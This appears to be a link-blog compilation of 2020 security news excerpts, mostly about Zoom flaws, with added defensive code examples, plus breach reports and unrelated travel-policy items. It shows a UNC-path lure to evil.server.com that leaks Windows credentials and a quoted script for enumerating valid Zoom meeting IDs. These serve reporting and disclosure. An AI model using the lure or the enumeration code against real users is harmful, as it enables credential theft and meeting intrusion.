But the Zoom client apparently also turns Windows networking Universal Naming Convention (UNC) paths into a clickable link in the chat messages, security researcher @_g0dmode has found.


Ok, so what’s the problem?

Bleeping Computer demonstrated how a regular URL and the UNC path \\evil.server.com\images\cat.jpg were both converted into a clickable link in the chat message.

The problem with this is, according to Bleeping Computer: “When a user clicks on a UNC path link, Windows will attempt to connect to a remote site using the SMB file sharing protocol to open the remote cat.jpg file.”

And at the same time, by default, Windows sends a user’s login name and NTLM password hash. This can be cracked fairly easily by an attacker to reveal your password.
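The root cause is a chat linkifier that turns anything path-like into a clickable link. As an added example (constructed code, not Zoom’s client or Bleeping Computer’s demonstration), the block below renders a few constructed chat messages two ways: a permissive linkifier that makes every URL-looking candidate clickable, UNC paths included, and a hardened one that only links http(s) URLs with a host and leaves UNC and file:// targets as plain text. The hostname evil.server.com is the one used in the article; the other sample messages are made up.

```python
import html
import re
from urllib.parse import urlsplit

# Anything that looks like a URL (scheme://...) or a UNC path (\\server\share\...) in a message.
_LINK_CANDIDATE = re.compile(r'\\\\\S+|[A-Za-z][A-Za-z0-9+.\-]*://\S+')

# Constructed sample chat messages; evil.server.com is the hostname used in the article.
SAMPLE_MESSAGES = [
    "agenda: https://example.com/agenda.pdf",
    r"cat pic: \\evil.server.com\images\cat.jpg",
    "notes on file://fileserver/share/notes.txt",
]


def _render(text, is_linkable):
    """Escape the message for HTML and wrap only the candidates that is_linkable() approves in <a>."""
    out, pos = [], 0
    for m in _LINK_CANDIDATE.finditer(text):
        out.append(html.escape(text[pos:m.start()]))
        target = m.group(0)
        if is_linkable(target):
            out.append('<a href="%s">%s</a>' % (html.escape(target, quote=True), html.escape(target)))
        else:
            out.append(html.escape(target))  # shown verbatim, but not clickable
        pos = m.end()
    out.append(html.escape(text[pos:]))
    return "".join(out)


def linkify_permissive(text):
    """The weak behaviour described above: every candidate, UNC paths included, becomes a link."""
    return _render(text, lambda target: True)


def is_web_url(target):
    """Allow only http(s) URLs with a host; UNC paths have no scheme at all and file:// is rejected."""
    parts = urlsplit(target)
    return parts.scheme.lower() in ("http", "https") and bool(parts.hostname)


def linkify_strict(text):
    """Hardened behaviour: only http(s) URLs are clickable; everything else stays text."""
    return _render(text, is_web_url)


def hrefs(rendered):
    """Extract the href targets from rendered HTML (for inspection and tests)."""
    return [html.unescape(h) for h in re.findall(r'href="([^"]*)"', rendered)]


if __name__ == "__main__":
    for msg in SAMPLE_MESSAGES:
        print("permissive:", hrefs(linkify_permissive(msg)))
        print("strict:    ", hrefs(linkify_strict(msg)))
```

The strict variant uses an allowlist of schemes rather than trying to recognise and reject UNC syntax, so other non-web targets a client might otherwise hand to the OS (file://, custom handlers) are excluded by the same rule.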

Security researcher Matthew Hickey posted an example of exploiting the Zoom Windows client using UNC path injection on Twitter.

Source: Zoom User Warning: This Is How Attackers Could Steal Windows Passwords

Zoom Users Beware: Here’s How A Flaw Allows Attackers To Take Over Your Mac Microphone And Webcam

Every day, a new Zoom security or privacy issue emerges. At least, that’s the way it seems during the COVID-19 crisis as an increasing number of people use the Zoom video conferencing app while working from home.

Soon after a security problem was disclosed that could allow attackers to steal Windows passwords, another researcher has identified two issues that can be used to take over a Zoom user’s Mac–and the microphone and webcam, according to TechCrunch.

The two bugs found by security researcher Patrick Wardle can be used by a local attacker able to gain physical control of a vulnerable Mac. By exploiting the bugs, the adversary can gain access to your computer and install malware or spyware, he wrote in a blog published today.

The first bug is based on another finding by @c1truz_, technical lead at a U.S. threat detection firm called VMRay. He said earlier this week on Twitter: “Ever wondered how the @zoom_us macOS installer does its job without you ever clicking install? Turns out they (ab)use preinstallation scripts, manually unpack the app using a bundled 7zip and install it to /Applications if the current user is in the admin group (no root needed).”

Source: Zoom Users Beware: Here’s How A Flaw Allows Attackers To Take Over Your Mac Microphone And Webcam

OpenWRT code-execution bug found – update!

For almost three years, OpenWRT—the open source operating system that powers home routers and other types of embedded systems—has been vulnerable to remote code-execution attacks because updates were delivered over an unencrypted channel and digital signature verifications are easy to bypass, a researcher said.

OpenWRT has a loyal base of users who use the freely available package as an alternative to the firmware that comes installed on their devices. Besides routers, OpenWRT runs on smartphones, pocket computers and even laptops and desktop PCs. Users generally find OpenWRT to be a more secure choice because it offers advanced functions and its source code is easy to audit.

Security researcher Guido Vranken, however, recently found that updates and installation files were delivered over unencrypted HTTP connections, which are open to attacks that allow adversaries to completely replace legitimate updates with malicious ones. The researcher also found that it was trivial for attackers with moderate experience to bypass the digital-signature checks that verify a downloaded update as the legitimate one offered by OpenWRT maintainers. The combination of those two lapses makes it possible to send a malicious update that vulnerable devices will automatically install.

Exploits not for everyone

These code-execution exploits are limited in their scope because adversaries must either be in a position to conduct a man-in-the-middle attack or tamper with the DNS server that a device uses to find the update on the Internet. That means routers on a network that has no malicious users and using a legitimate DNS server are safe from attack. Vranken also speculates that packet spoofing or ARP cache poisoning may also make attacks possible, but he cautions that he didn’t test either method.

Source: OpenWRT code-execution bug puts millions of devices at risk | Ars Technica

Zoom is Leaking Peoples’ Email Addresses and Photos to Strangers

Popular video-conferencing app Zoom is leaking personal information of at least thousands of users, including their email address and photo, and giving strangers the ability to attempt to start a video call with them through Zoom.

The issue lies in Zoom’s “Company Directory” setting, which automatically adds other people to a user’s lists of contacts if they signed up with an email address that shares the same domain. This can make it easier to find a specific colleague to call when the domain belongs to an individual company. But multiple Zoom users say they signed up with personal email addresses, and Zoom pooled them together with thousands of other people as if they all worked for the same company, exposing their personal information to one another.

“I was shocked by this! I subscribed (with an alias, fortunately) and I saw 995 people unknown to me with their names, images and mail addresses,” Barend Gehrels, a Zoom user impacted by the issue who flagged it to Motherboard, wrote in an email.

Gehrels provided a redacted screenshot of him logged into Zoom with the nearly 1000 different accounts listed in the “Company Directory” section. He said these were “all people I don’t know of course.” He said his partner had the same issue with another email provider, and had over 300 people listed in her own contacts.

“If you subscribe to Zoom with a non-standard provider (I mean, not Gmail or Hotmail or Yahoo etc), then you get insight to ALL subscribed users of that provider: their full names, their mail addresses, their profile picture (if they have any) and their status. And you can video call them,” Gehrels said. A user still has to accept the call from the stranger for it to start, however.

A redacted screenshot of the Company Directory issue provided by Gehrels. Image: Motherboard

On its website, Zoom says, “By default, your Zoom contacts directory contains internal users in the same organization, who are either on the same account or who’s email address uses the same domain as yours (except for publicly used domains including gmail.com, yahoo.com, hotmail.com, etc) in the Company Directory section.”

Zoom’s system does not exempt all domains that are used for personal email, however. Gehrels said he encountered the issue with the domains xs4all.nl, dds.nl, and quicknet.nl. These are all Dutch internet service providers (ISPs) which offer email services.

On Twitter Motherboard found other instances of Dutch users reporting the same issue.

“I just had a look at the free for private use version of Zoom and registered with my private email. I now got 1000 names, email addresses and even pictures of people in the company Directory. Is this intentional?,” one user tweeted last week along with a screenshot.

Dutch ISP XS4ALL tweeted in response to a complaint on Sunday, “This is something we cannot disable. You could see if Zoom can help you with this.”


Dutch ISP DDS told Motherboard in an email it was aware of the issue, but hadn’t heard directly from any of their own customers about it.

“Zoom maintains a blacklist of domains and regularly proactively identifies domains to be added,” a Zoom spokesperson told Motherboard. “With regards to the specific domains that you highlighted in your note, those are now blacklisted.” They also pointed to a section of the Zoom website where users can request other domains to be removed from the Company Directory feature.
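The design flaw here is grouping by email domain with a denylist of known public providers: any provider missing from the list (the Dutch ISPs above) is treated as a company. As an added example (constructed code, not Zoom’s implementation), the block below contrasts that denylist policy with an allowlist policy in which only domains an account administrator has verified are grouped. The accounts, the VERIFIED_ORG_DOMAINS set and the acme-corp.example domain are constructed; xs4all.nl is one of the domains named in the article.

```python
# Constructed sample accounts: one real company domain, one ISP domain, one webmail domain.
ACCOUNTS = [
    ("alice@acme-corp.example", "Alice"),
    ("bob@acme-corp.example", "Bob"),
    ("carol@xs4all.nl", "Carol"),
    ("dave@xs4all.nl", "Dave"),
    ("erin@gmail.com", "Erin"),
    ("frank@gmail.com", "Frank"),
]

# Denylist policy: group everyone by domain unless the domain is on a list of known public providers.
# The ISP domain is not on the list, so its subscribers end up in one "company".
PUBLIC_DOMAIN_DENYLIST = {"gmail.com", "yahoo.com", "hotmail.com"}

# Allowlist policy (an assumed design, not Zoom's): only domains an admin has verified are grouped.
VERIFIED_ORG_DOMAINS = {"acme-corp.example"}


def domain_of(email):
    return email.rsplit("@", 1)[1].lower()


def _same_domain_peers(email, accounts):
    d = domain_of(email)
    return [e for e, _ in accounts if e != email and domain_of(e) == d]


def directory_by_denylist(email, accounts):
    """Company Directory as the article describes it: same domain, unless the domain is denylisted."""
    if domain_of(email) in PUBLIC_DOMAIN_DENYLIST:
        return []
    return _same_domain_peers(email, accounts)


def directory_by_allowlist(email, accounts):
    """Company Directory that only ever groups accounts under a verified organisation domain."""
    if domain_of(email) not in VERIFIED_ORG_DOMAINS:
        return []
    return _same_domain_peers(email, accounts)


def exposed_accounts(policy, accounts):
    """Accounts outside any verified organisation whose directory nevertheless lists other people."""
    return sorted(e for e, _ in accounts
                  if domain_of(e) not in VERIFIED_ORG_DOMAINS and policy(e, accounts))


if __name__ == "__main__":
    print("denylist exposes:", exposed_accounts(directory_by_denylist, ACCOUNTS))
    print("allowlist exposes:", exposed_accounts(directory_by_allowlist, ACCOUNTS))
```

A denylist has to anticipate every public email provider in the world; an allowlist only has to know the domains a customer has actually claimed, so an unknown domain fails closed.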

Source: Zoom is Leaking Peoples’ Email Addresses and Photos to Strangers – VICE

Zoom: how you were able to join random meetings due to incredibly poor security design

In this publication we describe a technique which would have allowed a threat actor to potentially identify and join active meetings.

All the details discussed in this publication were responsibly disclosed to Zoom Video Communications, Inc. In response, Zoom introduced a number of mitigations, so this attack is no longer possible.

The Problem

If you use Zoom, you may already know that Zoom Meeting IDs are composed of 9, 10 or 11 digits. The problem was that if you hadn’t enabled the “Require meeting password” option or enabled Waiting Room, which allows manual participants admission, these 9-10-11 digits were the only thing that secured your meeting i.e. prevented an unauthorized person from connecting to it.


Let Me Guess…
The first thing we did was pre-generate the list of potentially valid Zoom Meeting IDs. We took 1000 “random” Meeting IDs and prepared the URL string for joining the meeting here as well:

from random import randint

urls = []
for _ in range(1000):
    # 9- or 10-digit candidate IDs, formatted as "Join Meeting" URLs
    urls.append("https://zoom.us/j/{}".format(randint(100000000, 9999999999)))

But how could we determine whether a Zoom Meeting ID represented a valid meeting or not? We discovered a fast and easy way to check this, based on the following “div” element present in the HTML body of the returned response when accessing the “Join Meeting” URL (https://zoom.us/j/{MEETING_ID}):

<div id="join-errormsg" class="error"><i></i><span>Invalid meeting ID.</span></div>

I Found It!
We then tried to automate the described approach (just in case you don’t want to brute force all the Meeting IDs by hand):

for url in urls:
    yield MakeHTTPRequest(url=url, callback=parseResponse)

def MakeHTTPRequest(url, callback):
    # Fetches the URL and hands the response to `callback`; the body is omitted in the write-up
    ...

def parseResponse(response):
    # The "join-errormsg" div is only absent when the ID belongs to an existing meeting
    if response.css('div#join-errormsg').get() is None:
        print('Valid Meeting ID found: {}'.format(response.url))
    else:
        print('Invalid Meeting ID')

…and look at the output:

Invalid Meeting ID
Invalid Meeting ID
Valid Meeting ID found: https://zoom.us/j/22XXX41X8
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Valid Meeting ID found: https://zoom.us/j/8XXX34XXX9
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Invalid Meeting ID
Valid Meeting ID found: https://zoom.us/j/93XXX9XXX5
Invalid Meeting ID
Invalid Meeting ID

Bingo!

Results
We were able to predict ~4% of randomly generated Meeting IDs, which is a very high chance of success compared to pure brute force.

Mitigation

We contacted Zoom on July 22, 2019 as part of a responsible disclosure process and proposed the following mitigations:
1. Re-implement the generation algorithm of Meeting IDs.
2. Replace the randomization function with a cryptographically strong one.
3. Increase the number of digits\symbols in the Meeting IDs.
4. Force hosts to use passwords\PINs\SSO for authorization purposes.

Zoom representatives were very collaborative and responded quickly to our emails. Here is the list of changes that were introduced to the Zoom client\infrastructure following our disclosure:

  1. Passwords are added by default to all future scheduled meetings.
  2. Users can add a password to already-scheduled future meetings and have received instructions by email on how to do so. See article for instructions: https://support.zoom.us/hc/en-us/articles/360033331271-Account-Setting-Update-Password-Default-for-Meeting-and-Webinar
  3. Password settings are enforceable at the account level and group level by the account admin.
  4. Zoom will no longer automatically indicate if a meeting ID is valid or invalid. For each attempt, the page will load and attempt to join the meeting. Thus, a bad actor will not be able to quickly narrow the pool of meetings to attempt to join.
  5. Repeated attempts to scan for meeting IDs will cause a device to be blocked for a period of time.
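To put the ~4% result and the proposed mitigations side by side, here is an added example (constructed code, not Check Point’s tooling or Zoom’s implementation) covering three of them: IDs drawn uniformly from the OS CSPRNG with a fixed digit count (mitigations 1 to 3), the expected number of live meetings a batch of random probes would find if IDs really were uniform, and a per-device rate limiter that blocks repeated join attempts (change 5 in Zoom’s list). The figure of one million concurrent meetings, and the limiter thresholds, are assumptions chosen for the demonstration.

```python
import secrets
from collections import defaultdict, deque


def keyspace(digits):
    """Number of distinct IDs with exactly `digits` digits (no leading zero)."""
    return 10 ** digits - 10 ** (digits - 1)


def generate_meeting_id(digits=11):
    """Uniform ID with exactly `digits` digits, drawn from the OS CSPRNG rather than random.randint."""
    return 10 ** (digits - 1) + secrets.randbelow(keyspace(digits))


def expected_hits(guesses, active_meetings, digits):
    """Expected live meetings found by `guesses` uniformly random probes when IDs are uniform too."""
    return guesses * active_meetings / keyspace(digits)


class JoinRateLimiter:
    """Blocks a device for block_s seconds once it exceeds max_attempts join attempts in window_s."""

    def __init__(self, max_attempts=10, window_s=60.0, block_s=600.0):
        self.max_attempts = max_attempts
        self.window_s = window_s
        self.block_s = block_s
        self._attempts = defaultdict(deque)   # device -> timestamps inside the window
        self._blocked_until = {}              # device -> time the block expires

    def attempt(self, device, now):
        """Record a join attempt at time `now` (seconds); return True if it may proceed."""
        if self._blocked_until.get(device, 0.0) > now:
            return False
        q = self._attempts[device]
        q.append(now)
        while q and q[0] <= now - self.window_s:   # drop attempts outside the window
            q.popleft()
        if len(q) > self.max_attempts:
            self._blocked_until[device] = now + self.block_s
            q.clear()
            return False
        return True


if __name__ == "__main__":
    # Assumption: one million meetings live at once, probed with 1000 guesses as in the write-up.
    print("example ID:", generate_meeting_id(11))
    print("expected hits per 1000 uniform guesses:", expected_hits(1000, 1_000_000, 11))
    limiter = JoinRateLimiter()
    print("attempt results:", [limiter.attempt("device-A", t) for t in range(12)])
```

With uniform 11-digit IDs and even a million live meetings, 1000 probes should find on the order of a hundredth of a meeting, not the ~40 the write-up observed; that gap is what made the original ID generation predictable rather than merely short. The limiter adds the second layer: even a predictable space cannot be enumerated if each device gets a handful of attempts per minute.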

Source: Zoom-Zoom: We Are Watching You – Check Point Research

FBI Issues Warning, NY Attorney General Makes Inquiry After Wave of Zoom Hijackings

The FBI has issued a warning about video messaging service Zoom, and New York Attorney General’s office has made an inquiry into its cybersecurity practices, after a string of disturbing incidents involving takeovers of teleconferences.

Per Agence France-Presse, malicious individuals have been taking advantage of lax security and the surge in teleconferencing during the coronavirus pandemic to pull off a trick called “Zoombombing,” in which they can join any public meeting and use the app’s screen-sharing mode to broadcast whatever they want. All Zoom meetings are public by default, and as the Verge noted, the settings to restrict screen sharing to the host of a meeting (or turn it off after a meeting starts) are hidden under menus. This means that anyone who forgets to tweak these settings, which appears to be an awful lot of people, is vulnerable to Zoombombing.

Trolls have eagerly taken the opportunity to hijack Zoom meetings and broadcast pornography, slurs, and Nazi imagery to everything from religious institutions and corporate meetings to classrooms at schools. In one incident, someone took over a Chipotle meeting on Zoom featuring musician Lauv and promptly flooded it with hardcore porn. Zoom, which has experienced an explosion in downloads during the ongoing period of social distancing, has seemed caught off guard.

On Monday, the FBI’s Boston office issued a warning that it “has received multiple reports of conferences being disrupted by pornographic and/or hate images and threatening language. As individuals continue the transition to online lessons and meetings, the FBI recommends exercising due diligence and caution in your cybersecurity efforts.” In the warning, it noted one Massachusetts incident in which an individual joined an online high school classroom hosted on Zoom to yell profanities and reveal the teacher’s home address. Another school reported an incident to the FBI in which a man with “swastika tattoos” joined a meeting; the FBI told anyone who has had a Zoom call hijacked to contact its Internet Crime Complaint Center.

A spokesperson for the NY Attorney General’s office told AFP that they had sent a letter to Zoom “with a number of questions to ensure the company is taking appropriate steps to ensure users’ privacy and security.” The spokesperson added that they were “trying to work with the company” to prevent future incidents.

This isn’t the first time Zoom has come under scrutiny. On Tuesday, a report in the Intercept found that the service promises end-to-end encryption for video meetings in which nobody dials in by phone, but that it actually uses transport encryption, allowing Zoom developers to access unencrypted audio and video content of meetings. (The Intercept noted that unlike Google, Facebook, and Microsoft, Zoom does not publish transparency reports on how many law enforcement requests for data it receives or how many it complies with.)

Zoom also recently pushed an update to nix code that sent analytics data to Facebook’s Graph API (even when Zoom users didn’t have an account on the social network) under a privacy policy that didn’t make the extent of the sharing clear. That is currently the subject of a class action lawsuit, though whether or not the suit is viable is another question. Zoom also eventually caved last year and patched a “click-to-join” feature that installed insecure local web servers on Mac machines that weren’t deleted when the app was removed, allowing remote access to the webcams of any Mac that had current or previous installations of Zoom. The company had initially defended it as a convenience feature.

“We work 24 hours a day to ensure that hospitals, universities, schools and other companies can be connected and operational,” a Zoom spokesperson told AFP. “We appreciate the interest of the New York prosecutor in these matters and are happy to deliver the requested information.”

Source: FBI Issues Warning, NY Attorney General Makes Inquiry After Wave of Zoom Hijackings

Zoom Meetings Aren’t End-to-End Encrypted, Despite Misleading Marketing. Also, they mine your data with vampire teeth.

Zoom, the video conferencing service whose use has spiked amid the Covid-19 pandemic, claims to implement end-to-end encryption, widely understood as the most private form of internet communication, protecting conversations from all outside parties. In fact, Zoom is using its own definition of the term, one that lets Zoom itself access unencrypted video and audio from meetings.

With millions of people around the world working from home in order to slow the spread of the coronavirus, business is booming for Zoom, bringing more attention on the company and its privacy practices, including a policy, later updated, that seemed to give the company permission to mine messages and files shared during meetings for the purpose of ad targeting.

Still, Zoom offers reliability, ease of use, and at least one very important security assurance: As long as you make sure everyone in a Zoom meeting connects using “computer audio” instead of calling in on a phone, the meeting is secured with end-to-end encryption, at least according to Zoom’s website, its security white paper, and the user interface within the app. But despite this misleading marketing, the service actually does not support end-to-end encryption for video and audio content, at least as the term is commonly understood. Instead it offers what is usually called transport encryption, explained further below.

When mousing over the green lock in the top left of the Zoom desktop app, it says, “Zoom is using an end to end encrypted connection”

Screenshot: The Intercept

In Zoom’s white paper, there is a list of “pre-meeting security capabilities” that are available to the meeting host that starts with “Enable an end-to-end (E2E) encrypted meeting.” Later in the white paper, it lists “Secure a meeting with E2E encryption” as an “in-meeting security capability” that’s available to meeting hosts. When a host starts a meeting with the “Require Encryption for 3rd Party Endpoints” setting enabled, participants see a green padlock that says, “Zoom is using an end to end encrypted connection” when they mouse over it.

But when reached for comment about whether video meetings are actually end-to-end encrypted, a Zoom spokesperson wrote, “Currently, it is not possible to enable E2E encryption for Zoom video meetings. Zoom video meetings use a combination of TCP and UDP. TCP connections are made using TLS and UDP connections are encrypted with AES using a key negotiated over a TLS connection.”

The encryption that Zoom uses to protect meetings is TLS, the same technology that web servers use to secure HTTPS websites. This means that the connection between the Zoom app running on a user’s computer or phone and Zoom’s server is encrypted in the same way the connection between your web browser and this article (on https://theintercept.com) is encrypted. This is known as transport encryption, which is different from end-to-end encryption because the Zoom service itself can access the unencrypted video and audio content of Zoom meetings. So when you have a Zoom meeting, the video and audio content will stay private from anyone spying on your Wi-Fi, but it won’t stay private from the company. (In a statement, Zoom said it does not directly access, mine, or sell user data; more below.)

Source: Zoom Meetings Do Not Support End-to-End Encryption

Oh dear.

Data of millions of eBay and Amazon shoppers exposed by VAT analysing 3rd party

Researchers have discovered another big database containing millions of European customer records left unsecured on Amazon Web Services (AWS) for anyone to find using a search engine.

A total of eight million records were involved, collected via marketplace and payment system APIs belonging to companies including Amazon, eBay, Shopify, PayPal, and Stripe.

Discovered by Comparitech’s noted breach hunter Bob Diachenko, the AWS instance containing the MongoDB database became visible on 3 February, where it remained indexable by search engines for five days.

Data in the records included names, shipping addresses, email addresses, phone numbers, items purchased, payments, order IDs, links to Stripe and Shopify invoices, and partially redacted credit cards.

Also included were thousands of Amazon Marketplace Web Services (MWS) queries, an MWS authentication token, and an AWS access key ID.

Because a single customer might generate multiple records, Comparitech wasn’t able to estimate how many customers might be affected.

About half of the customers whose records were leaked are from the UK; as far as we can tell, most if not all of the rest are from elsewhere in Europe.

How did this happen?

According to Comparitech, the unnamed company involved was a third party conducting cross-border value-added tax (VAT) analysis.

That is, a company none of the affected customers would have heard of or have any relationship with:

This exposure exemplifies how, when handing over personal and payment details to a company online, that info often passes through the hands of various third parties contracted to process, organize, and analyze it. Rarely are such tasks handled solely in house.

The exposed Amazon queries could be used to query the MWS API, Comparitech said, potentially allowing an attacker to request records from sales databases. For that reason, it recommended that the companies involved immediately change their passwords and keys.

Your data was ‘taken without permission’, customers told, after personal info accessed in O2 UK partner Aerial Direct database

Hackers have slurped biz comms customers’ data from a database run by one of O2’s largest UK partners.

In an email sent to its customers, the partner, Aerial Direct, said that an unauthorised third party had been able to access customer data on 26 February through an external backup database, which included personal information on both current and expired subscribers from the last six years.

The data accessed included personal information, such as names, dates of birth, business addresses, email address, phone numbers, and product information. The company said no passwords or financial information was taken.

“As soon as we became aware of this unauthorised access we shut down access to the system and launched a full investigation, with assistance from experts, to determine what happened and what information was affected. We immediately reported this matter to the Information Commissioner’s Office and are actively working on fully exploring the details of how it happened.”

Source: Your data was ‘taken without permission’, customers told, after personal info accessed in O2 UK partner’s database • The Register

Carnival Corp. (Holland America / Princess Cruises) Discloses nasty customer Data Breach Amid Covid-19 Panic

Earlier this month, the multibillion-dollar cruise conglomerate Carnival Corp. announced that two of its most popular lines—Holland America and Princess Cruises—were respectively slammed with hacks compromising the sensitive personal intel of cruise-goers and cruise-workers alike. Even though neither announcement makes mention of when each respective breach was disclosed, pulling up the source code for the Princess line’s disclosure reveals that the post happened midday on March 2—just as the U.S. began to learn of the country’s first deaths from covid-19—which is probably why the breach news slipped past most of our radars.

Per Carnival, its cruise companies were hit sometime between April and July of last year, when “an unsanctioned third party gained unauthorized access to some employee email accounts that contained personal information regarding our employees, crew, and guests.”

What kind of information did the “unsanctioned third party” access? All the bad types. Carnival offers a brief rundown:

The types of data potentially impacted varies by individual but can include: name, address, Social Security number, government identification number, such as passport number or driver’s license number, credit card and financial account information, and health-related information.

While neither cruise line has released any hard evidence of any of these details being misused (yet), Holland America’s notice makes sure to mention that guests should consider contacting the major credit bureaus in their respective countries to put fraud alerts on their credit reports. The line also offered to set people up with free credit monitoring and identity protection services to give their guests some “peace of mind.”

Source: Carnival Corp. Discloses Data Breach Amid Covid-19 Panic

900 Million Secrets From 8 Years of ‘Whisper’ App Were Left Exposed Online

Whisper, the secret-sharing app that called itself the “safest place on the Internet,” left years of users’ most intimate confessions exposed on the Web tied to their age, location and other details, raising alarm among cybersecurity researchers that users could have been unmasked or blackmailed.

The data exposure, discovered by independent researchers and shown to The Washington Post, allowed anyone to access all of the location data and other information tied to anonymous “whispers” posted to the popular social app, which has claimed hundreds of millions of users. The records were viewable on a non-password-protected database open to the public Web. A Post reporter was able to freely browse and search through the records, many of which involved children: A search of users who had listed their age as 15 returned 1.3 million results.

The cybersecurity consultants Matthew Porter and Dan Ehrlich, who lead the advisory group Twelve Security, said they were able to access nearly 900 million user records from the app’s release in 2012 to the present day. The researchers alerted federal law-enforcement officials and the company to the exposure.

Shortly after researchers and The Post contacted the company on Monday, access to the data was removed.

Source: 900 Million Secrets From 8 Years of ‘Whisper’ App Were Left Exposed Online – Slashdot

US Rule Waiver Will Reduce Empty Planes During Virus Outbreak (after in EU) and then closes US airspace to EU flights after blaming EU for Corona

Federal regulators waived a rule Wednesday that was causing airlines to fly nearly empty planes just to avoid losing takeoff and landing rights at major airports.

The Federal Aviation Administration said it would suspend the rule through May 31 to help airlines that are canceling flights because of the new virus outbreak.

The FAA assigns takeoff and landing rights, or “slots,” at a few big, congested airports. Airlines must use 80% of their highly coveted slots or risk forfeiting them.

That FAA requirement — and especially a similar rule in Europe — led airlines to operate flights using those slots even if there were very few passengers.

The FAA’s decision affects flights at John F. Kennedy and LaGuardia airports in New York and Reagan Washington National Airport outside Washington, D.C.

The FAA said it also would not punish airlines that cancel flights through May 31 at four other airports where the agency approves schedules: Chicago’s O’Hare International Airport, Newark Liberty International Airport in New Jersey; Los Angeles International Airport and San Francisco International Airport.

The FAA waiver covers U.S. and foreign airlines. The agency’s announcement came a day after the European Commission promised to move quickly to waive its similar rule.

It could take weeks or even months for the European Commission to adopt the proposal, but it is likely to have immediate effect. It is a signal to airlines that they can stop flying mostly empty planes and still be confident that the emergency rule change will be approved before airport slots are allotted again.

Source: Rule Waiver Will Reduce Empty Planes During Virus Outbreak | Time

Donald Trump has suspended all travel to the US from Europe for 30 days to try and tackle the coronavirus crisis.

The draconian measures come into effect from midnight Friday, but do not apply to the United Kingdom. Trump revealed his plans in a rare Oval Office address on Wednesday night while criticizing the European Union for allowing the virus to take hold.

He said: ‘The European Union failed to take the same precautions (as the US) and restrict travel from China and other hotspots. As a result, a large number of new clusters in the United States were seeded by travelers from Europe.

‘After consulting with our top government health officials I have decided to take several strong but necessary actions to protect the health of all Americans. To stop new cases from entering our shores we will be suspending all travel from Europe to our shores for 30 days.’

Source: Donald Trump bans all travel from Europe to US for 30 days to stop coronavirus

Intel CPUs vulnerable to new LVI attacks, allows information injection

Named Load Value Injection, or LVI for short, this is a new class of theoretical attacks against Intel CPUs.

While the attack has been deemed only a theoretical threat, Intel has released firmware patches to mitigate attacks against current CPUs, and fixes will be deployed at the hardware (silicon design) level in future generations.

A reverse Meltdown attack

To understand what an LVI attack is, users must first be aware of the Meltdown and Spectre attacks, and more particularly Meltdown.

Disclosed in January 2018, the Meltdown attack allowed an attacker running code on a CPU to read data from the CPU’s memory, while the CPU was processing “speculative” operations.

Speculative execution is a feature of all modern CPUs, one in which the CPU computes information in advance in an attempt to guess future results. The entire idea of speculative execution is to have the data ready for the CPU, if it ever needs it, and help improve the CPU’s speed and performance. Once data is not needed, it’s discarded. Meltdown and Spectre attacks target data while in this “transient” state, while waiting to be dismissed.


The Meltdown and Spectre attacks were groundbreaking when they were first revealed in 2018, showing a major flaw in the designs of modern CPUs.

Based on the original attacks, academics around the world later expanded the original research and discovered an entire class of so-called “transient attacks” that also leaked data from CPUs in their “transient” speculative execution states.

Besides Meltdown and Spectre, other transient attacks were eventually discovered during the past two years, including the likes of Foreshadow, Zombieload, RIDL, Fallout, and LazyFP.


LVI’s position in all these attacks is, technically, of a reverse-Meltdown. While the original Meltdown bug allowed attackers to read an app’s data from inside a CPU’s memory while in a transient state, LVI allows the attacker to inject code inside the CPU and have it executed as a transient “temporary” operation, giving attackers more control over what happens.


Tests performed by the two research teams — who found the LVI attack independently from one another — have been successful at proving the attack’s broad impact.

[…]

Current LVI attack demos rely on running malicious code on a computer, suggesting that local access is needed — such as delivering malicious code to the target via malware.

However, a remote attack is also possible via JavaScript, by tricking users into accessing a malicious site — similar to the original Meltdown attack, which could also be carried out via JavaScript.

[…]

While a change in the silicon design will eventually come with future CPUs, currently, Intel has prepared software-based mitigations, in the form of CPU firmware (microcode) updates.

However, according to preliminary tests, these mitigations come with a severe performance impact that may slow down computations by a factor of 2 to 19, depending on how many of the mitigations system administrators decide to apply to their CPUs.

Currently, many administrators are expected to skip these patches, primarily because of the severe performance impact.

Source: Intel CPUs vulnerable to new LVI attacks | ZDNet